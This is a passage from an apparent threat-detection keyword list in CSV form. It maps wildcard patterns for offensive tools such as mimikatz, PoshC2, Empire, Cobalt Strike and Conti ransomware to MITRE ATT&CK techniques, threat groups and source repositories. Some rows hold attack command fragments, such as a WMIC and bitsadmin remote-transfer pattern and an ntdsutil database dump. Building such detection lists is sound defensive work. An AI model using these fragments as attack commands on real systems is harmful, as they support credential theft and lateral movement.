TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::sleep*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::version*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standin --asrep*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --dc*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --delegation*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --group *Domain Admins*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --object *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*standin --spn*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*StarFighters*,offensive_tool_keyword,StarFighters,A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017,T1059 - T1055 - T1218 - T1027,TA0002 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz/StarFighters,1,0,N/A,N/A,4,320,66,2017-06-05T19:18:38Z,2017-06-05T18:28:22Z -*Starkiller*,offensive_tool_keyword,Starkiller,Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide. If you'd like to request a feature or report a bug. please follow the Issue template.,T1105 - T1210 - T1059 - T1027 - T1035,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,C2,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,10,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*StarkillerSnackbar.vue*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*staroffice2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Start Menu\Programs\Startup\Loader.exe*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,0,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*start PsExec.exe -d *,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*start stinger ,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,0,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *,greyware_tool_keyword,wmic,WMIC suspicious transfer ,T1105 - T1041 - T1048,TA0002 - TA0003 - TA0010,N/A,N/A,Exploitation Tools,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*start_mythic_server.sh*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*start_nbnsspoof*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Start-ACLsAnalysis -Domain*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*startanotherimplant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Start-CaptureServer.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*startdaisy*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Start-domainACLsAnalysis*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*starting Multi-Layered ACLight scan*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*-start-keylogger*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*start-keystrokes*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*start-keystrokes-writefile*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Start-MonitorTCPConnections.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*start-process ntdsutil.exe *create full**,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*StartProcessFake(*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*Start-PSAmsiClient.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Start-PSAmsiServer.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Start-TCPMonitor*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Start-MonitorTCPConnections.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*startupfolderperistence.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Start-WebServer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*StartWebServiceBeacon*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*static_syscalls_apc_spawn *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*static_syscalls_apc_spawn*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*static_syscalls_dump*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 